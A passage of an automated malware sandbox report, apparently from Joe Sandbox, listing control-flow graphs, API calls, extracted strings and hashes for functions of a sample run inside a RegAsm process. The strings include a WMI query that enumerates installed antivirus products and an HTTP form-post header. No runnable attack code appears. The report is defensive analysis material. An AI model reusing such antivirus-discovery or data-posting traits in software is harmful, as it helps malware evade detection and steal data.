4316c5-4316d4 call 414d50 2666->2677 2678 4316d9-4316eb call 414d50 2666->2678 2667->2665 2673 431836-4318df call 566450 * 3 call 566330 call 41fbd0 call 414d50 2669->2673 2674 4318e4-431909 call 414d00 CreateFileA 2669->2674 2673->2669 2684 43190b-431939 call 414d00 WriteFile CloseHandle 2674->2684 2685 43193f-431953 2674->2685 2677->2665 2693 431701-431713 call 414d50 2678->2693 2694 4316ed-4316fc call 414d50 2678->2694 2684->2685 2690 431955-431969 call 53e35a 2685->2690 2691 43198f-4319a7 2685->2691 2690->2691 2710 43196b-43198c call 41f450 call 53e28a call 53e309 2690->2710 2695 4319a9-431a0d call 4f4970 2691->2695 2696 431a0f-431a14 call 4ed870 2691->2696 2712 431715-431724 call 414d50 2693->2712 2713 431729-43173b call 414d50 2693->2713 2694->2665 2709 431a19-431a2d call 417140 * 2 2695->2709 2696->2709 2709->2519 2710->2691 2712->2665 2724 43174e-431760 call 414d50 2713->2724 2725 43173d-43174c call 414d50 2713->2725 2738 431773-431785 call 414d50 2724->2738 2739 431762-431771 call 414d50 2724->2739 2725->2665 2746 431787-431796 call 414d50 2738->2746 2747 431798-4317aa call 414d50 2738->2747 2739->2665 2746->2665 2747->2665 2752 4317ac-4317b8 call 414d50 2747->2752 2752->2665
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 00430AEA
                                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 00430DF9
                                                                                                                                                                                                                                              • Part of subcall function 0041FB00: __aulldiv.LIBCMT ref: 0041FB82
                                                                                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 00430E9F
                                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 00430F0B
                                                                                                                                                                                                                                              • Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC38
                                                                                                                                                                                                                                              • Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC81
                                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 00431045
                                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 0043117A
                                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 0043133A
                                                                                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 00431391
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: __aulldiv$__fread_nolock
                                                                                                                                                                                                                                            • String ID: L>.$eks$j3l6lrek$n{$n{$n{$n{$}{$}{
                                                                                                                                                                                                                                            • API String ID: 3493607940-3512644766
                                                                                                                                                                                                                                            • Opcode ID: c74d939869d5d861e5b6224adf4615317356a071d5d6f0203eff5a362e83a648
                                                                                                                                                                                                                                            • Instruction ID: 4b8030dd088baf5a40f7a31888a250f1bbbdb175115375ead4fba1f87eac71f9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c74d939869d5d861e5b6224adf4615317356a071d5d6f0203eff5a362e83a648
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6EB2A1B1D002189FDB24DB64CC91BEEB7B5BB88304F14819AE509B7390DB786E85CF95
                                                                                                                                                                                                                                            Function 0042F900 Relevance: 39.7, APIs: 13, Strings: 9, Instructions: 1186COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 2177 42f900-42f92d call 41b910 2180 42f930-42f940 2177->2180 2180->2180 2181 42f942-42fa8d call 41a1e0 call 566450 call 566330 call 414fd0 2180->2181 2190 42fac4-42facc call 41bb40 2181->2190 2191 42fa8f-42fa96 2181->2191 2196 42fad1-42fad8 2190->2196 2193 42faa1 2191->2193 2194 42fa98-42fa9f 2191->2194 2195 42faa8-42faae 2193->2195 2194->2195 2195->2190 2197 42fab0-42fac2 call 414e70 2195->2197 2198 42fae3 2196->2198 2199 42fada-42fae1 2196->2199 2197->2196 2201 42faea-42faf0 2198->2201 2199->2201 2203 42faf2-42fb0c call 4ee3c0 2201->2203 2204 42fb4a-42fb71 call 417140 2201->2204 2210 42fb12-42fb22 2203->2210 2209 42fb7c-42fb80 2204->2209 2211 42fb82-42fbb7 2209->2211 2212 42fbb9-42fc08 call 414d00 call 54e93c 2209->2212 2210->2210 2213 42fb24-42fb45 call 4172e0 2210->2213 2211->2209 2220 42fc0e-42feb7 call 566450 * 2 call 41fb00 call 566450 call 566330 call 566450 * 2 call 41fb00 call 54f2dd call 566450 * 3 call 566330 call 41fbd0 2212->2220 2221 4303cc-4303e3 call 417140 * 2 2212->2221 2213->2204 2255 42fec7-42fecb call 54ea78 2220->2255 2256 42feb9-42fec5 2220->2256 2231 430996-43099c 2221->2231 2260 42fed0-42feea call 417140 * 2 2255->2260 2256->2255 2257 42feef-43018b call 566450 * 2 call 41fb00 call 566450 * 3 call 566330 call 41fbd0 call 54edcb call 54e81e call 566450 call 566330 call 566450 * 2 call 41fb00 call 54edcb 2256->2257 2296 43019b-4301a7 call 41bba0 2257->2296 2297 43018d-430199 call 41bb40 2257->2297 2260->2231 2301 4301ac-43030e call 566450 call 566330 call 414d00 call 54f2dd 2296->2301 2297->2301 2310 430310-430324 call 53e35a 2301->2310 2311 43034a-430362 2301->2311 2310->2311 2319 430326-430347 call 41f450 call 53e28a call 53e309 2310->2319 2313 4303b4-4303b9 call 4ed870 2311->2313 2314 430364-4303b2 call 4fa560 call 4f4970 2311->2314 2318 4303be-4305bc call 54ea78 call 414e10 call 566450 * 2 call 41fb00 call 414e10 call 4ee4c0 call 566450 * 3 call 566330 call 41fbd0 call 566450 * 2 call 41fb00 2313->2318 2314->2318 2361 4305c2-4305d3 call 414d50 2318->2361 2362 430720-43077f call 566450 * 2 call 41fb00 2318->2362 2319->2311 2368 4305d5-4305e4 call 414d50 2361->2368 2369 4305e9-4305fb call 414d50 2361->2369 2382 43078a-430790 2362->2382 2379 43071b 2368->2379 2376 430611-430623 call 414d50 2369->2376 2377 4305fd-43060c call 414d50 2369->2377 2388 430625-430634 call 414d50 2376->2388 2389 430639-43064b call 414d50 2376->2389 2377->2379 2385 430796-430845 call 566450 * 3 call 566330 call 41fbd0 call 414d50 2382->2385 2386 43084a-43086f call 414d00 CreateFileA 2382->2386 2385->2382 2395 430871-43089f call 414d00 WriteFile CloseHandle 2386->2395 2396 4308a5-4308b9 2386->2396 2388->2379 2404 430661-430673 call 414d50 2389->2404 2405 43064d-43065c call 414d50 2389->2405 2395->2396 2401 4308f5-43090d 2396->2401 2402 4308bb-4308cf call 53e35a 2396->2402 2407 430975-43097a call 4ed870 2401->2407 2408 43090f-430973 call 4f4970 2401->2408 2402->2401 2423 4308d1-4308f2 call 41f450 call 53e28a call 53e309 2402->2423 2419 430675-430684 call 414d50 2404->2419 2420 430689-43069b call 414d50 2404->2420 2405->2379 2422 43097f-430993 call 417140 * 2 2407->2422 2408->2422 2419->2379 2437 4306ae-4306c0 call 414d50 2420->2437 2438 43069d-4306ac call 414d50 2420->2438 2422->2231 2423->2401 2451 4306d3-4306e5 call 414d50 2437->2451 2452 4306c2-4306d1 call 414d50 2437->2452 2438->2379 2457 4306e7-4306f6 call 414d50 2451->2457 2458 4306f8-43070a call 414d50 2451->2458 2452->2379 2457->2379 2458->2379 2463 43070c-430718 call 414d50 2458->2463 2463->2379
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 0042FA4A
                                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 0042FD59
                                                                                                                                                                                                                                              • Part of subcall function 0041FB00: __aulldiv.LIBCMT ref: 0041FB82
                                                                                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 0042FDFF
                                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 0042FE6B
                                                                                                                                                                                                                                              • Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC38
                                                                                                                                                                                                                                              • Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC81
                                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 0042FFA5
                                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 004300DA
                                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 0043029A
                                                                                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 004302F1
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: __aulldiv$__fread_nolock
                                                                                                                                                                                                                                            • String ID: :HX$eks$j3l6lrek$n{$n{$n{$n{$}{$}{
                                                                                                                                                                                                                                            • API String ID: 3493607940-1063084820
                                                                                                                                                                                                                                            • Opcode ID: 532caf60c6cf616ad5d5eae1d4895ffaaa9251bf357276fc58caa28fa9e03192
                                                                                                                                                                                                                                            • Instruction ID: 80603ceed5e5ecb815a2336bb84db937df39f84d1c4a8ceee33aefd1604ca137
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 532caf60c6cf616ad5d5eae1d4895ffaaa9251bf357276fc58caa28fa9e03192
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5DB2A1B1D001189FDB24CB64CC91BEEB7B5BB88304F1481AAE509B7391DB786E85CF95
                                                                                                                                                                                                                                            Function 00432DB0 Relevance: 25.4, APIs: 3, Strings: 11, Instructions: 892COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 2755 432db0-432f59 call 566450 * 2 call 41fb00 call 566450 call 566330 2767 433b45-433b66 call 41b910 2755->2767 2768 432f5f 2755->2768 2775 433b6c-433b7c 2767->2775 2769 432f73-433015 call 566450 * 3 call 566330 call 41fbd0 2768->2769 2770 432f61-432f6d 2768->2770 2790 433020-433024 2769->2790 2770->2767 2770->2769 2775->2775 2777 433b7e-433ba9 call 41a1e0 call 417140 2775->2777 2786 433bac-433bb2 2777->2786 2791 433026-43305b 2790->2791 2792 43305d-4330ab call 41b910 2790->2792 2791->2790 2796 4330b1-4330c1 2792->2796 2796->2796 2797 4330c3-433215 call 41a1e0 call 410820 call 4150c0 * 2 call 410ec0 call 4f3910 call 566450 * 2 call 41fb00 2796->2797 2816 43321b 2797->2816 2817 433b1f-433b40 call 417140 call 414930 call 433cb0 2797->2817 2819 43322f-43326d call 42b6e0 2816->2819 2820 43321d-433229 2816->2820 2817->2767 2826 433278-43327c 2819->2826 2820->2817 2820->2819 2828 4332b5-4332fe call 4187e0 2826->2828 2829 43327e-4332b3 2826->2829 2834 433300-433314 call 53e35a 2828->2834 2835 43333a-433352 2828->2835 2829->2826 2834->2835 2843 433316-433337 call 41f450 call 53e28a call 53e309 2834->2843 2837 4333a4-4333a9 call 4ed870 2835->2837 2838 433354-4333a2 call 4fa560 call 4f4970 2835->2838 2842 4333ae-4333e4 call 41b910 call 417560 call 53e01e 2837->2842 2838->2842 2859 4333f3 2842->2859 2860 4333e6-4333f1 call 432ab0 2842->2860 2843->2835 2862 4333fa-433421 call 433c10 2859->2862 2860->2862 2866 43342c-433430 2862->2866 2867 433432-43346f 2866->2867 2868 433471-4334b6 call 433bc0 2866->2868 2867->2866 2872 4334c1-4334c5 2868->2872 2873 4334c7-433504 2872->2873 2874 433506-4336ea call 4187e0 call 566450 * 2 call 41fb00 call 566450 call 566330 call 41b910 2872->2874 2873->2872 2890 4336f0-433703 2874->2890 2890->2890 2891 433705-433757 call 4f4e30 call 4150c0 2890->2891 2896 43375d-43376d 2891->2896 2896->2896 2897 43376f-4337b4 call 417380 call 414f60 call 508d80 2896->2897 2903 4337b9-4337f9 call 417140 call 414fd0 2897->2903 2908 433830-433838 call 41bb40 2903->2908 2909 4337fb-433802 2903->2909 2913 43383d-433844 2908->2913 2911 433804-43380b 2909->2911 2912 43380d 2909->2912 2914 433814-43381a 2911->2914 2912->2914 2916 433852 2913->2916 2917 433846-433850 2913->2917 2914->2908 2915 43381c-43382e call 414e70 2914->2915 2915->2913 2919 43385c-433865 2916->2919 2917->2919 2921 433867-433881 call 4ee3c0 2919->2921 2922 4338bf-4338dd call 417140 2919->2922 2929 433887-433897 2921->2929 2927 4338e3-433972 call 4150c0 * 2 call 411340 call 4f3910 2922->2927 2928 433a01-433a24 call 414fd0 2922->2928 2959 433974-4339e6 call 414f60 call 417140 call 414930 call 417140 * 4 call 414930 call 433cb0 call 417140 2927->2959 2960 4339eb-4339fc call 417140 call 414930 2927->2960 2937 433a26-433a2d 2928->2937 2938 433a64-433a6c call 41bb40 2928->2938 2929->2929 2932 433899-4338ba call 4172e0 2929->2932 2932->2922 2940 433a3b 2937->2940 2941 433a2f-433a39 2937->2941 2943 433a71-433a78 2938->2943 2945 433a45-433a4e 2940->2945 2941->2945 2946 433a86 2943->2946 2947 433a7a-433a84 2943->2947 2945->2938 2949 433a50-433a62 call 414e70 2945->2949 2950 433a90-433a99 2946->2950 2947->2950 2949->2943 2953 433af3-433b1a call 417140 * 4 2950->2953 2954 433a9b-433ab5 call 4ee3c0 2950->2954 2953->2817 2966 433abb-433acb 2954->2966 2959->2786 2960->2928 2966->2966 2970 433acd-433aee call 4172e0 2966->2970 2970->2953
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: __aulldiv
                                                                                                                                                                                                                                            • String ID: 0srs$;$Content-Type: application/x-www-form-urlencoded$O$Z$Z$_$eks$j3l6lrek$n{$n{
                                                                                                                                                                                                                                            • API String ID: 3732870572-2963995603
                                                                                                                                                                                                                                            • Opcode ID: 192aa7069a3292968c221378c7975d9db53774aaabc96253b2cb5ffcdd6923fe
                                                                                                                                                                                                                                            • Instruction ID: e4f144eb6866c9f15e0174b874faaea5c0fb60d0f0c4e6e2486b5e18bccaafbb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 192aa7069a3292968c221378c7975d9db53774aaabc96253b2cb5ffcdd6923fe
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2923670D002289BDB24DF68CC95BEEBBB1BF89304F1481DAE409A7251DB786E85CF55
                                                                                                                                                                                                                                            Function 004327D0 Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 226COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 2994 4327d0-4327ea CoInitializeEx 2995 4327f1-432810 CoInitializeSecurity 2994->2995 2996 4327ec 2994->2996 2997 432812-432818 CoUninitialize 2995->2997 2998 43281d-432843 CoCreateInstance 2995->2998 2999 432aa6-432aa9 2996->2999 2997->2999 3000 432845-432849 2998->3000 3001 43284b-432851 CoUninitialize 2998->3001 3000->3001 3002 432856-43287e call 41f8a0 3000->3002 3001->2999 3005 432880-43288a 3002->3005 3006 43288c 3002->3006 3007 432893-4328bb 3005->3007 3006->3007 3009 4328bd-4328c5 call 41f930 3007->3009 3010 4328cc-4328d0 3007->3010 3009->3010 3011 4328d2-4328d6 3010->3011 3012 4328d8-4328de CoUninitialize 3010->3012 3011->3012 3014 4328e3-43290b call 41f830 3011->3014 3012->2999 3018 432919 3014->3018 3019 43290d-432917 3014->3019 3020 432920-43293c call 41f830 3018->3020 3019->3020 3023 43294a 3020->3023 3024 43293e-432948 3020->3024 3025 432951-432975 3023->3025 3024->3025 3027 432977-43297f call 41f930 3025->3027 3028 432986-43298a 3025->3028 3027->3028 3030 43299b-43299f 3028->3030 3031 43298c-432994 call 41f930 3028->3031 3034 4329a1-4329a5 3030->3034 3035 4329a7-4329ad CoUninitialize 3030->3035 3031->3030 3034->3035 3037 4329b2-4329b9 3034->3037 3035->2999 3038 432aa0 CoUninitialize 3037->3038 3039 4329bf-4329f2 3037->3039 3038->2999 3041 4329f4-4329f8 3039->3041 3042 4329fa 3039->3042 3041->3042 3043 4329ff-432a27 3041->3043 3042->3038 3045 432a29-432a87 call 540db0 call 41f490 call 414fd0 call 4f4620 call 417140 VariantClear 3043->3045 3046 432a8d-432a9b 3043->3046 3045->3046 3046->3037
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CoInitializeEx.COMBASE(00000000,00000002), ref: 004327DD
                                                                                                                                                                                                                                            • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00432803
                                                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 00432812
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Initialize$SecurityUninitialize
                                                                                                                                                                                                                                            • String ID: %ws$ROOT\SecurityCenter2$Select * From AntiVirusProduct$WQL$displayName
                                                                                                                                                                                                                                            • API String ID: 3757020523-4229669714
                                                                                                                                                                                                                                            • Opcode ID: 88eccf8f6f5f30755d0606065e9f676c2976c28a324dac60e7812de777e2f57c
                                                                                                                                                                                                                                            • Instruction ID: 4288d1d4c252e29bef7cf26b8597fe6888cbe1e75489e8b63adeb755e9b52ba4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 88eccf8f6f5f30755d0606065e9f676c2976c28a324dac60e7812de777e2f57c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E0A13A74E00209EFDB14DF94C995BEEB7B1FF48304F20815AE512AB290D7B86A85DF54
                                                                                                                                                                                                                                            Function 00433F10 Relevance: 22.5, APIs: 3, Strings: 9, Instructions: 1456COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: __aulldiv
                                                                                                                                                                                                                                            • String ID: L9> $])$-8$eks$i$j3l6lrek$m$r$u$z
                                                                                                                                                                                                                                            • API String ID: 3732870572-3037306690
                                                                                                                                                                                                                                            • Opcode ID: b0e1fa4259044d80adeb30d09293f3d5f155c6cfd5bd19649a9d9b605f864a58
                                                                                                                                                                                                                                            • Instruction ID: 097ec3de9a0d552a72c5eead724637650cdad3b65235f9df5b072cebc6055ced
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b0e1fa4259044d80adeb30d09293f3d5f155c6cfd5bd19649a9d9b605f864a58
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DCE27770D042688BDB24DB64CC95BEEBBB5BF89304F0481EAE50967381DB782E85CF55
                                                                                                                                                                                                                                            Function 0046C8D0 Relevance: 19.1, APIs: 2, Strings: 7, Instructions: 3312COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: __aulldiv
                                                                                                                                                                                                                                            • String ID: %$&$'$)$3$n{$n{
                                                                                                                                                                                                                                            • API String ID: 3732870572-2532145099
                                                                                                                                                                                                                                            • Opcode ID: 6ea8a89286e234f3ff5a9c569daa4bc7dafe51be686659d628aeb03c5347155d
                                                                                                                                                                                                                                            • Instruction ID: 89ab8af2effcce1828f03fdfc84ecafc5db9519518d43a3ea0e0583515a2c9db
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6ea8a89286e234f3ff5a9c569daa4bc7dafe51be686659d628aeb03c5347155d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DD83EF70D052688FCB65CB28CC90BEEBBB1AF89308F0481DAD54DA7252DB356E85CF55
                                                                                                                                                                                                                                            Function 00480800 Relevance: 18.4, APIs: 2, Strings: 7, Instructions: 2639COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: __aulldiv
                                                                                                                                                                                                                                            • String ID: %$&$'$)$3$n{$n{
                                                                                                                                                                                                                                            • API String ID: 3732870572-2532145099
                                                                                                                                                                                                                                            • Opcode ID: 60bf89a3398121356d5fb1ca8792d352d9738faa35e858238f94284debbd103d
                                                                                                                                                                                                                                            • Instruction ID: 37d35a44749faca35bb33d2e4c8781066b915a47dcec7222e6112f98420e28d2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 60bf89a3398121356d5fb1ca8792d352d9738faa35e858238f94284debbd103d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C553F170D052688FCB25DB28CC90BEEBBB5AF89308F1481DAD549A7252DB346F85CF54
                                                                                                                                                                                                                                            Function 0047DEB0 Relevance: 17.5, APIs: 2, Strings: 7, Instructions: 1747COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 4930 47deb0-47dee3 call 41f450 call 47fcb0 4935 47def4-47defb 4930->4935 4936 47df42-47df92 call 41b910 4935->4936 4937 47defd-47df40 4935->4937 4941 47df98-47dfa8 4936->4941 4937->4935 4941->4941 4942 47dfaa-47e14f call 41a1e0 call 4f4620 call 417140 call 540db0 call 566450 call 566330 call 4419d0 4941->4942 4958 47e15a-47e15e 4942->4958 4959 47e160-47e19d 4958->4959 4960 47e19f-47e1f8 call 41b910 4958->4960 4959->4958 4964 47e1fe-47e20e 4960->4964 4964->4964 4965 47e210-47e28f call 41a1e0 call 441af0 4964->4965 4971 47e295-47e2d4 call 47fd20 4965->4971 4972 47e601-47e61f call 47fdf0 4965->4972 4978 47e2df-47e2e3 4971->4978 4977 47e62a-47e62e 4972->4977 4979 47e630-47e66d 4977->4979 4980 47e66f-47e6c8 call 41b910 4977->4980 4981 47e2e5-47e322 4978->4981 4982 47e324-47e374 call 41b910 4978->4982 4979->4977 4989 47e6ce-47e6de 4980->4989 4981->4978 4990 47e37a-47e38a 4982->4990 4989->4989 4991 47e6e0-47e75f call 41a1e0 call 441af0 4989->4991 4990->4990 4992 47e38c-47e3c3 call 41a1e0 4990->4992 5003 47e765-47e7a4 call 47ff20 4991->5003 5004 47eb30-47eb54 call 480070 4991->5004 4997 47e3c9-47e3d9 4992->4997 4997->4997 4999 47e3db-47e46f call 4f7b50 call 414f60 call 414e70 call 414f60 call 417140 * 2 call 47d520 4997->4999 5047 47e47a-47e47e 4999->5047 5013 47e7af-47e7b3 5003->5013 5012 47eb65-47eb6c 5004->5012 5015 47eb6e-47ebba 5012->5015 5016 47ebbc-47ec21 call 41b910 5012->5016 5017 47e7b5-47e7f2 5013->5017 5018 47e7f4-47e84a call 41b910 5013->5018 5015->5012 5028 47ec27-47ec3d 5016->5028 5017->5013 5029 47e850-47e866 5018->5029 5028->5028 5031 47ec3f-47ecc1 call 41a1e0 call 441af0 5028->5031 5029->5029 5032 47e868-47e8a8 call 41a1e0 5029->5032 5049 47ecc7-47ed0c call 480200 5031->5049 5050 47f0c1-47f0e5 call 4803a0 5031->5050 5041 47e8ae-47e8c4 5032->5041 5041->5041 5045 47e8c6-47e963 call 4f7b50 call 414f60 call 414e70 call 414f60 call 417140 * 2 call 480000 5041->5045 5116 47e974-47e97b 5045->5116 5052 47e480-47e4bd 5047->5052 5053 47e4bf-47e500 call 4186f0 call 4400a0 5047->5053 5063 47ed1d-47ed24 5049->5063 5064 47f0f6-47f0fd 5050->5064 5052->5047 5072 47e505-47e51b 5053->5072 5067 47ed26-47ed72 5063->5067 5068 47ed74-47edd0 call 41b910 5063->5068 5070 47f0ff-47f14b 5064->5070 5071 47f14d-47f1b2 call 41b910 5064->5071 5067->5063 5086 47edd6-47edec 5068->5086 5070->5064 5087 47f1b8-47f1ce 5071->5087 5078 47e5e6-47e5fc call 417140 * 2 5072->5078 5079 47e521-47e528 5072->5079 5078->4972 5083 47e533-47e558 5079->5083 5083->5078 5088 47e55e-47e590 call 4ee300 5083->5088 5086->5086 5091 47edee-47ee2e call 41a1e0 5086->5091 5087->5087 5092 47f1d0-47f252 call 41a1e0 call 441af0 5087->5092 5103 47e592-47e5dc call 4150c0 call 417140 * 2 call 4f12c0 * 2 5088->5103 5104 47e5e1 5088->5104 5108 47ee34-47ee4a 5091->5108 5121 47f65d-47f7d8 call 540db0 call 566450 call 566330 call 414fd0 call 47dcf0 5092->5121 5122 47f258-47f29d call 4804e0 5092->5122 5162 47fcaa-47fcae 5103->5162 5104->5083 5108->5108 5112 47ee4c-47eee9 call 4f7b50 call 414f60 call 414e70 call 414f60 call 417140 * 2 call 480330 5108->5112 5190 47eefa-47ef01 5112->5190 5118 47e97d-47e9c9 5116->5118 5119 47e9cb-47ea2d call 4186f0 call 4400a0 5116->5119 5118->5116 5147 47eb15-47eb1b call 417140 5119->5147 5148 47ea33-47ea3d 5119->5148 5189 47f7e9-47f7f0 5121->5189 5137 47f2ae-47f2b5 5122->5137 5142 47f2b7-47f303 5137->5142 5143 47f305-47f361 call 41b910 5137->5143 5142->5137 5161 47f367-47f37d 5143->5161 5163 47eb20-47eb2b call 417140 5147->5163 5154 47ea4e-47ea76 5148->5154 5154->5147 5160 47ea7c-47eab1 call 4ee300 5154->5160 5175 47eab3-47eb0b call 4150c0 call 417140 * 2 call 4f12c0 * 3 5160->5175 5176 47eb10 5160->5176 5161->5161 5166 47f37f-47f3bf call 41a1e0 5161->5166 5163->5004 5182 47f3c5-47f3db 5166->5182 5175->5162 5176->5154 5182->5182 5187 47f3dd-47f47a call 4f7b50 call 414f60 call 414e70 call 414f60 call 417140 * 2 call 4805d0 5182->5187 5266 47f48b-47f492 5187->5266 5194 47f7f2-47f83e 5189->5194 5195 47f840-47f87b call 4ee260 5189->5195 5196 47ef03-47ef4f 5190->5196 5197 47ef51-47efb3 call 4186f0 call 4400a0 5190->5197 5194->5189 5211 47f966-47f98a call 4806a0 5195->5211 5212 47f881-47f8a5 call 480640 5195->5212 5196->5190 5219 47f0a6-47f0bc call 417140 * 2 5197->5219 5220 47efb9-47efc3 5197->5220 5226 47f99b-47f9a2 5211->5226 5228 47f8b6-47f8bd 5212->5228 5219->5050 5225 47efd4-47effc 5220->5225 5225->5219 5231 47f002-47f037 call 4ee300 5225->5231 5232 47f9a4-47f9f0 5226->5232 5233 47f9f2-47fa3f call 4186f0 call 414d00 call 42b840 5226->5233 5235 47f8bf-47f90b 5228->5235 5236 47f90d-47f961 call 414fd0 call 414e70 call 417140 5228->5236 5252 47f0a1 5231->5252 5253 47f039-47f09c call 4150c0 call 417140 * 2 call 4f12c0 * 4 5231->5253 5232->5226 5267 47fa44-47fa49 5233->5267 5235->5228 5236->5211 5252->5225 5253->5162 5268 47f494-47f4e0 5266->5268 5269 47f4e2-47f544 call 4186f0 call 4400a0 5266->5269 5270 47fc50-47fca7 call 414fd0 call 417140 * 2 call 4f12c0 * 5 5267->5270 5271 47fa4f-47fa73 call 480790 5267->5271 5268->5266 5293 47f642-47f658 call 417140 * 2 5269->5293 5294 47f54a-47f554 5269->5294 5270->5162 5283 47fa84-47fa8b 5271->5283 5287 47fa8d-47fad9 5283->5287 5288 47fadb-47fb3d call 4186f0 call 4400a0 